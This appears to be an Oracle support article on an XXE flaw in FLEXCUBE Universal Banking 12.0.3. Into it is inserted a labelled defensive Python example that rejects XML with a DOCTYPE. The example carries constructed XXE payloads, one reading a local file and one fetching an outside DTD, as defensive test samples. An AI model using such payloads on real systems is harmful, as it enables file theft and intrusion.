
XML External Entity Injection (Doc ID 2661459.1)

Last updated on SEPTEMBER 10, 2020

Applies to:

Oracle FLEXCUBE Universal Banking - Version 12.0.3 and later
Information in this document applies to any platform.

Symptoms

On: 12.0.3 version, Production Support-SET

ACTUAL BEHAVIOR
---------------
XML External Entity Injection showing sensitive data.



EXPECTED BEHAVIOR
-----------------
The application server should not disclose sensitive information.

STEPS
-----
The issue can be reproduced at will with the following steps:
1. CVA 0999 XML External Entity (XXE) Out-Of-Band vulnerability was found in the FLEXCUBE application (intranet-facing, post-authentication).
This vulnerability could allow an attacker to read arbitrary local files from the application server, exposing sensitive information, and to consume memory resources.
XML External Entity attacks abuse an XML feature for building documents dynamically at processing time: it allows data to be included from a given resource.
External entities can force the XML parser to access the resource named by the URI (a file on the local machine or on a remote system). This behavior exposes the application to XML External Entity (XXE) attacks. External entities can be used to disclose internal files through the file URI handler, to reach internal file shares, to perform internal port scanning, and to achieve remote code execution and denial of service.
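The defender-side check that follows from the description above, as an added example that is not part of the Oracle article: it refuses any document carrying a DOCTYPE, so no entity (external or parameter) can be declared, and exercises that policy against constructed in-band and out-of-band payloads of the kinds the article names. Python's stdlib expat bindings are assumed only so the example runs offline; the sample documents and the URIs in them are constructed, not taken from the page.

```python
"""Fail-closed XML intake: refuse any document that carries a DOCTYPE.

External entities can only be declared inside a DTD, so rejecting the
DOCTYPE itself blocks in-band, blind and out-of-band XXE as well as
entity-expansion DoS, with no list of 'dangerous' URI schemes to maintain.
"""
import xml.parsers.expat as expat
import xml.etree.ElementTree as ET


class DoctypeRejected(ValueError):
    """The document declares a DTD and therefore may declare entities."""


def _reject_doctype(name, sysid, pubid, has_internal_subset):
    # expat fires this once at '<!DOCTYPE', before any entity is declared or resolved
    raise DoctypeRejected(f"DOCTYPE {name!r} refused (SYSTEM={sysid!r})")


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML from an untrusted client, raising DoctypeRejected on any DTD."""
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _reject_doctype
    # Belt and braces in case the policy above is ever relaxed: never fetch
    # parameter entities, and abort (return 0) on any external entity reference.
    scanner.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    scanner.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 0
    scanner.Parse(data, True)          # propagates DoctypeRejected from the handler
    return ET.fromstring(data)         # only reached for DTD-free documents


# Constructed samples (hypothetical; not taken from the article).
BENIGN = b'<?xml version="1.0"?><txn><acct>ACC-0001</acct></txn>'
# In-band XXE: external general entity that would read a local file.
XXE_FILE = (b'<?xml version="1.0"?>'
            b'<!DOCTYPE txn [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>'
            b'<txn><acct>&xxe;</acct></txn>')
# Out-of-band XXE: parameter entity that would fetch a DTD from an outside host.
XXE_OOB = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE txn [<!ENTITY % ext SYSTEM "http://dtd.example.invalid/x.dtd"> %ext;]>'
           b'<txn/>')


def classify(data: bytes) -> str:
    """Return 'ok' when the document parsed, 'rejected' when it carried a DTD."""
    try:
        parse_untrusted_xml(data)
        return "ok"
    except DoctypeRejected:
        return "rejected"
```

On a Java application server the same policy is the JAXP feature http://apache.org/xml/features/disallow-doctype-decl set to true on the parser factory, which the OWASP XXE guidance recommends as the primary defence.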


Cause


